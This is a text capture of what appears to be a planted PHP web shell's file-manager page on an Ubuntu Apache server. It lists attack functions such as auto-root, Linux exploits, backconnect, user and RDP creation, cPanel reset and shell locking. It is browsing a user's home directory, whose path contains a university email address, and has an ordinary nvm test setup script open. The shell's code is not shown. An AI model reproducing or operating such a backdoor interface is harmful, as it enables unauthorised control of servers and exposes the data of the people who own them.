Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
udbhav21433@iiitd.edu.in /
.nvm /
test /
sourcing /
[ HOME SHELL ]
Name
Size
Permission
Action
Sourcing nvm.sh global alias b...
863
B
-rwxr-xr-x
Sourcing nvm.sh should keep ve...
592
B
-rwxr-xr-x
Sourcing nvm.sh should use the...
1.13
KB
-rwxr-xr-x
Sourcing nvm.sh with --install...
850
B
-rwxr-xr-x
Sourcing nvm.sh with --install...
1
KB
-rwxr-xr-x
Sourcing nvm.sh with --no-use ...
992
B
-rwxr-xr-x
Sourcing nvm.sh with no defaul...
314
B
-rwxr-xr-x
setup
373
B
-rwxr-xr-x
teardown
112
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setup
#!/bin/sh mkdir -p ../../alias rm -rf ../../alias/default rm -f ../../.nvmrc rm -rf ../../v0.10.7 rm -rf ../../v0.9.7 rm -rf ../../v0.9.12 \. ../../nvm.sh nvm install 0.10.1 || echo >&2 'nvm install 0.10.1 failed' nvm install 0.10.3 || echo >&2 'nvm install 0.10.3 failed' nvm unalias default || 'removing default alias failed' nvm unload || echo >&2 'nvm unload failed'
Close